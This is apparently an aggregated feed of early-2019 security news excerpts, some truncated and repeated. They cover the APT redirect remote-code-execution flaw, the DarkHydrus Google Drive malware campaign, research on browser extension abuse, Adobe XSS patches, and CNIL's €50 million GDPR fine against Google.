Just in time…

Cybersecurity experts this week fighting over Twitter in favor of not using HTTPS and suggesting software developers to only rely on signature-based package verification just because APT on Linux also does the same.

Just today, a security researcher revealed details of a critical remote code execution flaw in Linux APT, exploitation of which could have been mitigated if the

Source

image
Just in time… Some cybersecurity experts this week arguing over Twitter in favor of not using HTTPS and suggesting software developers to only rely on signature-based package verification, just because APT on Linux also does the same. Ironically, a security researcher just today revealed details of a new critical remote code execution flaw in the apt-get utility that can be exploited by a remote, man-in-the middle attacker to compromise Linux machines. The flaw, apparently, once again demonstrates that if the software download ecosystem uses HTTPS to communicate safely, such attacks can easily be mitigated at the first place. Discovered by Max Justicz, the vulnerability (CVE-2019-3462) resides in the APT package manager, a widely used utility that handles installation, update and removal of software on Debian, Ubuntu, and other Linux distributions. According to a blog post published by Justicz and details shared with The Hacker News, the APT utility doesn't properly sanitize certain parameters during HTTP redirects, allowing man-in-the-middle attackers to inject malicious content and trick the system into installing altered packages. APT HTTP redirects help Linux machines to automatically find suitable mirror server to download software packages when others are unavailable. If the first server somehow fails, it returns a response with the location of next server from where the client should request the package. “Unfortunately, the HTTP fetcher process URL-decodes the HTTP Location header and blindly appends it to the 103 Redirect response,” Justicz explains. As shown by the researcher in a video demonstration shared with The Hacker News, an attacker—intercepting HTTP traffic between APT utility and a mirror server, or just a malicious mirror—can inject malicious packages in the network traffic and execute arbitrary code on the targeted system with the highest level of privileges, i.e. root. “You can completely replace the requested package, as in my proof of concept. You could substitute a modified package as well, if you wanted to,” Justicz told THN. Though Justicz has not tested, he believes the vulnerability affects all type of package downloads, even if you are installing a package for the very first time or updating an old one. No doubt, to protect the integrity of the software packages, it's important to use signature-based verification, as software developers do not have control over mirror servers, but that doesn't mean one should ignore benefits of using HTTPS protocol over the complexity of infrastructural upgrades in some particular cases. No software, platform or server can claim to be 100% secure, so adopting the idea of defense-in-depth is never a bad idea to consider. It should also be noted that cybersecurity experts do not expect organizations or open-source developers to implement HTTPS overnight, but they should also not even reject the defensive measures completely. “By default, Debian and Ubuntu both use plain http repositories out of the box (Debian lets you pick what mirror you want during installation, but doesn't actually ship with support for https repositories – you have to install apt-transport-https first),” the researcher explains. “Supporting http is fine. I just think it's worth making https repositories the default – the safer default – and allowing users to downgrade their security at a later time if they choose to do so.” The developers of APT software have released updated version 1.4.9 to fix the reported remote code execution vulnerability. Since apt-get is part of many major Linux distributions including Debian and Ubuntu, who have also acknowledged the flaw and released security updates, it is highly recommended for Linux users to update their systems as soon as possible.

Source

image
By Waqas DarkHydrus is back in action with a new variant of RogueRobin malware to target Middle Eastern Politicians by abusing Google Drive. The primary focus of cybercriminals nowadays is to use the infrastructure of genuine services in their attacks in order to prevent detection from security tools. The same strategy has been adopted by DarkHydrus group […] This is a post from HackRead.com Read the original post: DarkHydrus Phishery tool spreading malware using Google Drive

Source

image
Researchers have added another reason to be suspicious of web browser extensions. According to a recently published academic report, various Chrome, Firefox and Opera browser extensions can be compromised by an adversary that can steal sensitive browser data and plant arbitrary files on targeted systems. “We identified a good number of extensions that can be exploited by web applications to benefit from their privileged capabilities,” wrote Université Côte d’Azur researcher Dolière Francis Somé, in an academic paper titled Empowering Web Applications with Browser Extensions (PDF). A web application is a client-server computer program that a computing device runs in a web browser – such as an online form or browser-based word processor. That’s separate from a browser extension – a small software add-on for customizing a web browser with something like an ad-blocker or a web-clipping tool. “[Browser extensions] have access to sensitive user information, including browsing history, bookmarks, credentials (cookies) and list of installed extensions,” Somé pointed out. “They have access to a permanent storage in which they can store data as long as they are installed in the user’s browser. They can trigger the download of arbitrary files and save them on the user’s device.” That access is unique to web applications, which are subject to what are called a Same Origin Policy (SOP) that bars an app from reading and writing user data between domains. The research, however, demonstrates how a specially crafted web application can bypass SOP protections by exploiting privileged browser extensions. “Our results demonstrate that the communications between browser extensions and web applications pose serious security and privacy threats to browsers, web applications and more importantly to users,” according to the research. The attack, according to researchers, would follow this example: “An attacker [uses] a script that is present in a web application currently running in the user browser. The script either belongs to the web application or to a third party. The goal of the attacker is to interact with installed extensions, in order to access user sensitive information. It relies on extensions whose privileged capabilities can be exploited via an exchange of messages with scripts in the web application,” researchers wrote. They added, “Even though content scripts, background pages and web applications run in separate execution contexts, they can establish communication channels to exchange messages with one another… APIs [are used] for sending and receiving (listening for) messages between the content scripts, background pages and web applications.” Somé focused on a specific class of web extension called “WebExtensions API,” a cross-browser extensions system compatible with major browsers including Chrome, Firefox, Opera and Microsoft Edge. After analyzing 78,315 extensions that used the specific WebExtension API, it found 3,996 that were suspicious. (see chart below) While it seems voluminous, Somé noted that research found a small number of vulnerable extensions overall, and that concern should be measured. However, “browser vendors need to review extensions more rigorously, in particular take into consideration the use of message passing interfaces in extensions.”

Source

image
France’s National Data Protection Commission (CNIL) has fined Google $57 million (€50 million) for violations of the General Data Protection Regulation (GDPR) – the largest fine yet issued under the EU’s new data privacy law. In investigating group complaints from privacy advocacy groups None Of Your Business and La Quadrature du Net (the latter representing 10,000 citizens), CNIL found Google lacking in transparency when it comes to how it collects and handles user data in the name of serving up personalized ads. “Despite the measures implemented by Google (documentation and configuration tools), the infringements observed deprive the users of essential guarantees regarding processing operations that can reveal important parts of their private life, since they are based on a huge amount of data, a wide variety of services and almost unlimited possible combinations,” CNIL said in a Monday statement. The regulator also noted the scope of the violations’ impact. “The violations are continuous breaches of the Regulation as they are still observed to date. It is not a one-off, time-limited, infringement,” it said, adding, “taking into account the important place that the operating system Android has on the French market, thousands of French people create, every day, a Google account when using their smartphone.” GDPR Violations Under the GDPR, consent must be obtained before any data is collected, let alone kept or used for follow-on purposes, such as targeted advertising. This means information gleaned from websites, account registrations, social media, advertising and marketing efforts, newsletters and list rentals, data brokerages, public sources of information and more. This profoundly changes the way an American company, such as Google’s subsidiary DoubleClick, profiles and targets ads to internet users in the E.U. In this case, the French regulator determined that information from Google about how data is collected, collated and used across as many as 20 different Google services is relatively obscured. The internet giant, according to CNIL, breaks up the information across several documents, so that the full extent of Google’s data processing practices can only be uncovered by going down a rabbit hole of several links. “The relevant information is accessible after several steps only, implying sometimes up to five or six actions,” CNIL said on Monday in its statement. “For instance, this is the case when a user wants to have complete information on his or her data collected for the personalization purposes or for the geo-tracking service.” Further, even after accessing the pertinent information, the documents lack detail in terms of exactly where and how user data is utilized for advertising purposes, according to CNIL. “The [data] processing operations are particularly massive and intrusive because of the number of services offered (about 20), [and] the amount and the nature of the data [being] processed and combined,” the regulator explained. Google’s practices are “described in a too generic and vague manner, and so are the categories of data processed for these various purposes.” As such, CNIL determined that Google doesn’t obtain valid consent from users to use their data for ad personalization – explicit consent being a key requirement of the GDPR. “The users’ consent is not sufficiently informed…[because the information] is diluted in several documents and does not enable the user to be aware of their extent,” the authority noted. Thus, “the collected consent is neither ‘specific’ nor ‘unambiguous.'” CNIL added that even though users can modify their account options to opt out of seeing personalized ads, the option to see them is pre-ticked, meaning there is no “clear affirmative action from the user (by ticking a non-pre-ticked box for instance)” to receive the ads. And finally, before creating an account, the user is asked to tick a box for “I agree to Google’s Terms of Service” and “I agree to the processing of my information as described above and further explained in the Privacy Policy.” However, CNIL said this isn’t specific and matched to a distinct purpose, and therefore does not satisfy GDPR rules. GDPR Enforcement Ramps Up The Google fine is far and away the largest penalty issued since the GDPR went into effect last May. However, it could have been much larger: GDPR violations can incur fines of up to 4 percent of global turnover. While the GDPR is a European regulation, it affects any organization that handles data on E.U. citizens, whether they be customers or partners – including American companies. That means any entity in the U.S. is subject to enforcement actions, such as fines, if they do business with any E.U. citizen. In other words, it’s an E.U. law, but has global applicability. Enforcement actions have been slow to roll out, largely because it takes time to build a consensus on how to determine compliance. The GDPR contains a series of articles that lay out a complex set of requirements for those handling E.U. citizen data. Yet, in terms of what compliance actually looks like in the real world, there are several areas of uncertainty that will only play out and become clarified over time. Click to Expand. Google is the largest fish to be caught in the GDPR net to date, but it surely won’t be the last. Over the course of the fall, Data Protection Authorities (DPAs) in various countries began leaping into the enforcement fray – a state of affairs that’s unlikely to wane anytime soon. Some of the actions have not carried fines: The U.K.’s Information Commissioner’s Office (ICO) for instance in October found that Canada-based AggregateIQ Data Services used personal data—including names and email addresses—of U.K. individuals to target them with political advertising messages on social media without their consent. The ICO ordered AggregateIQ to erase any personal data of U.K. individuals retained on its servers. Similarly, in France, CNIL recently found that a mobile marketing and ad tech agency, Vectuary, illegally obtained the consent of more than 67 million people to collect their data. It was also ordered to purge all personal data for the affected individuals. On the financial penalty front, in September Austria’s Osterreichische Datenschutzbehorde fined a retailer €4,800 for using a surveillance camera that recorded passersby without their consent. Also, Portugal’s Comissao Nacional de Proteccao de Dados fined a hospital, Barreiro Montijo, €400,000 for not restricting employee access to patient data. Most recently, Germany’s State Commissioner for Data Protection and Freedom of Information Baden-Wuerttemberg fined a German social-media company and maker of the flirting app “Knuddels” €20,000 in November after a data breach. It came to light that the service was storing user passwords in plain text, without pseudonymizing and encrypting personal data as required by the GDPR.

Source

image
Adobe has issued unscheduled patches for vulnerabilities rated “important” across its Experience Manager platform, which allows developers to create mobile apps, social campaigns and landing pages. Overall, Adobe issued three fixes, including an “important” flaw (CVE-2018-19726) and a “moderate” flaw (CVE-2018-19727) in its Adobe Experience Manager, and an “important” vulnerability (CVE-2018-19724) in its Adobe Experience Manager Forms. The important vulnerability in Adobe’s Experience Manager platform impacts versions 6.0 through 6.4 of the product. The flaw is a stored cross-site scripting glitch that could lead to sensitive information disclosure. Stored cross-site scripting is the most dangerous type of cross-site scripting, according to researchers with Imperva. This type of attack occurs when a web application gathers potentially malicious input from a user – and then stores that input in a data store for later use. The attack could potentially be used to hijack another user’s browser, capture sensitive information, or other malicious uses. Credit: Imperva Adobe said that the update for this is a priority 2, meaning that it resolves flaws in a product that have historically been at elevated risk – but there are currently no known exploits. The moderate-rated severity meanwhile is a reflected cross-site scripting vulnerability that could lead to sensitive information disclosure. This flaw specifically impacts Adobe Experience Manager versions 6.3 and 6.4. Reflected cross-site scripting occurs when attackers injects browser executable codes in a single HTTP response. This type of injected attack is less severe because it is not stored within the application itself. Instead, the attack is non-persistent and only impacts users who open a maliciously crafted third-party web page. On the Experience Manager Forms front, Adobe released a fix for an important stored cross-site scripting flaw. The forms are often used in large enterprises to create and reuse various digital forms by copying them to a content management system. “Adobe has released security updates for Adobe Experience Manager Forms,” the company said in its release. “These updates resolve a stored cross-site scripting vulnerability rated important that could result in sensitive information disclosure.” The flaw specifically impacts versions 6.2, 6.3, and 6.4 of Adobe Experience Manager Forms, and is also a priority-2 update. Researcher Adam Willard was credited with reporting the flaw. Adobe’s latest fixes come after its regularly scheduled update in January where it released patches for two bugs rated important in its Adobe Digital Edition and Adobe Connect products. The two important vulnerabilities include an information-disclosure bug in Adobe’s eBook reader software program, Digital Edition; as well as a session-token exposure bug in its presentation and web conferencing software, Adobe Connect. In another unscheduled update in January, the company fixed two critical flaws in Adobe Acrobat and Reader for Windows and MacOS. The two critical vulnerabilities, CVE-2018-16011 and CVE-2018-19725, could be successfully exploited to carry out arbitrary code execution in the context of the current user.

Source

The French data protection watchdog CNIL has issued its first fine of €50 million (around $57 million) under the European Union's new General Data Protection Regulation (GDPR) law that came into force in May last year.

The fine has been levied on Google for “lack of transparency, inadequate information and lack of valid consent regarding the ads personalization,” the CNIL (National Data

Source

image
The French data protection watchdog CNIL has issued its first fine of €50 million (around $57 million) under the European Union's new General Data Protection Regulation (GDPR) law that came into force in May last year. The fine has been levied on Google for “lack of transparency, inadequate information and lack of valid consent regarding the ads personalization,” the CNIL (National Data Protection Commission) said in a press release issued today. The fine was imposed following the latest CNIL investigation into Google after receiving complaints against the company in May 2018 by two non-profit organizations—None Of Your Business (NOYB) and La Quadrature du Net (LQDN). Why Has Google Been Fined? According to the CNIL, Google has been found violating two core privacy rules of the GDPR—Transparency, and Consent. First, the search engine giant makes it too difficult for users to find essential information, like the “data-processing purposes, the data storage periods or the categories of personal data used for the ads personalisation,” by excessively disseminating them across several documents with buttons and links and requiring up to 6 separate actions to get to the information. And even when the users find the information they are looking for, the CNIL says that information is “not always clear nor comprehensive.” “Users are not able to fully understand the extent of the processing operations carried out by Google,” the Commission says. “Similarly, the information communicated is not clear enough so that the user can understand that the legal basis of processing operations for the ads personalization is the consent and not the legitimate interest of the company.” Secondly, Google does not obtain its user's valid consent to process data for ads personalization purposes. Google Fined For Violating GDPR Law According to the CNIL, the option to personalize ads is “pre-ticked” when creating an account with Google, effectively making its users unable to exercise their right to opt out of data processing for ads personalization, which is illegal under the GDPR. Finally, the CNIL says Google by default ticks the boxes that say “I agree to Google’s Terms of Service” and that “I agree to the processing of my information as described above and further explained in the Privacy Policy” when users create an account. However, broader consent like this is also illegal under the GDPR rules. “The user gives his or her consent in full, for all the processing operations purposes carried out by Google based on this consent (ads personalization, speech recognition, etc.),” the Commission says. Although the 50 million euros fine seems large, it is small compared to the maximum penalty allowed by GDPR for large companies like Google, which is 20 million euros or 4 percent of the company's annual global revenue, whichever is higher. Besides Google, NOYB and LQDN also filed a complaint against Facebook in May, so let's see what happens to Facebook next. Other Record Fines On Google It's not the first time when Google has been fined under privacy violation. Back in July, the company was levied with a record $5 billion fine by the EU in an Android antitrust case, which Google is currently appealing. However, a few months back, the search engine giant overhauled its Android business model in Europe, electing to charge a fee to European Android phone manufacturers who want to include its apps on their Android handsets. The EU also hit Google with a separate antitrust penalty of $2.7 billion (2.4 billion euros) in 2017 over shopping-search results in Google Search. In response to the GDPR fine imposed by France, Google said in a statement: “People expect high standards of transparency and control from us. We're deeply committed to meeting those expectations and the consent requirements of the GDPR. We’re studying the decision to determine our next steps.” Have something to say about this article? Comment below or share it with us on Facebook, Twitter or our LinkedIn Group.

Source

Since most security tools also keep an eye on the network traffic to detect malicious IP addresses, attackers are increasingly adopting infrastructure of legitimate services in their attacks to hide their malicious activities.

Cybersecurity researchers have now spotted a new malware attack campaign linked to the notorious DarkHydrus APT group that uses Google Drive as its command-and-control (

Source